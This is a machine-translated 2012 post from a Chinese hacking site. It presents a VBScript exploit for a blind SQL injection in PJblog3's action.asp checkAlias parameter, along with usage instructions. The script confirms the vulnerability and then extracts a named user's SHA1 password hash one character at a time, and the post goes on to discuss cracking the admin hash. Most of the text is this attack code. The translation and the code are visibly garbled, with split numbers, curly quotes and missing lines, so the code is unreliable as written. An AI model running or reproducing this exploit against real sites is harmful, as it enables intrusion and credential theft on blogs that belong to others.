PJblog3 vulnerability Description and use-vulnerability and early warning-the black bar safety net

ID MYHACK58:62201235410
Type myhack58
Reporter 佚名
Modified 2012-11-03T00:00:00


Really does not want to understand such vulnerability so long official why not repair now there is such a vulnerability to straighten the more terrible the registered members straight plug word

The tool is to use VBS to write the code as follows:

Copy the contents to the clipboard the program code

If WScript. Arguments. Count <> 2 Then

WScript. Echo “Usage: Cscript.exe Exp. vbs to detect the forum URL you want to detect the user name”

WScript. Echo “Example: Cscript.exe Exp. vbs http://www.pjhome.net puterjam”

WScript. Quit

End If

attackUrl = WScript. Arguments(0)

attackUser = WScript. Arguments(1)

attackUrl = Replace(attackUrl,”\”,”/”)

If Right(attackUrl , 1) <> “/” Then

attackUrl = attackUrl & “/”

End If

SHA1Charset = “0123456789ABCDEFJ”

strHoleUrl = attackUrl & “action. asp? action=checkAlias&cname=0kee”"”

If IsSuccess(strHoleUrl & "or""1""=""1") And Not IsSuccess(strHoleUrl & "and""1""=""2") Then

WScript. Echo “congratulations! The presence of vulnerability”


WScript. Echo “there is no vulnerability detected”

WScript. Quit

End If

For n=1 To 4 0

For i=1 To 1 7

strInject = strHoleUrl & " or 0<(Select Count(*) From blog_member Where mem_name='" & amp; attackUser & "' And mem_password>='" & strResult & Mid(SHA1Charset, i, 1) & "') And""1""=""1"

If Not IsSuccess(strInject) Then

strResult = strResult & Mid(SHA1Charset, i-1, 1)

Exit For

End If

strPrint = chr(1 3) & “Password(SHA1): ” & strResult & Mid(SHA1Charset, i, 1)

WScript. StdOut. Write strPrint



WScript. Echo Chr(1 3) & Chr (1 0) & “Done!”

Function PostData(PostUrl)

Dim Http

Set Http = CreateObject(“msxml2. serverXMLHTTP”)

With Http

. Open “GET”,PostUrl,False

. Send ()

PostData = . ResponseBody

End With

Set Http = Nothing

PostData =bytes2BSTR(PostData)

End Function

Function bytes2BSTR(vIn)

Dim strReturn

Dim I, ThisCharCode, NextCharCode

strReturn = “”

For I = 1 To LenB(vIn)

ThisCharCode = AscB(MidB(vIn, I, 1))

If ThisCharCode < &H80 Then

strReturn = strReturn & Chr(ThisCharCode)


NextCharCode = AscB(MidB(vIn, I + 1, 1))

strReturn = strReturn & Chr(CLng(ThisCharCode) * &H100 + CInt(NextCharCode))

I = I + 1

End If


bytes2BSTR = strReturn

End Function

Function IsSuccess(PostUrl)

strData = PostData(PostUrl)

‘Wscript. Echo strData

if InStr(strData,”check_error”) >0 then

IsSuccess = True


IsSuccess = False

End If

‘Wscript. Sleep 5 0 0 ‘let system rest.

End Function

Use method: in cmd, enter“Cscript 1. vbs to the detection of the blog URL you want to detect admin user name”, excluding the double quotation marks

Give the administrator password to the SHA1 hash, looks like now crack difficult, can only brute force, don't know to break to when. Online online hack is MD5, so a lot of sites are switching to SHA1 encryption, our PJblog is no exception, however over period of time online crack SHA1 should also be more and more.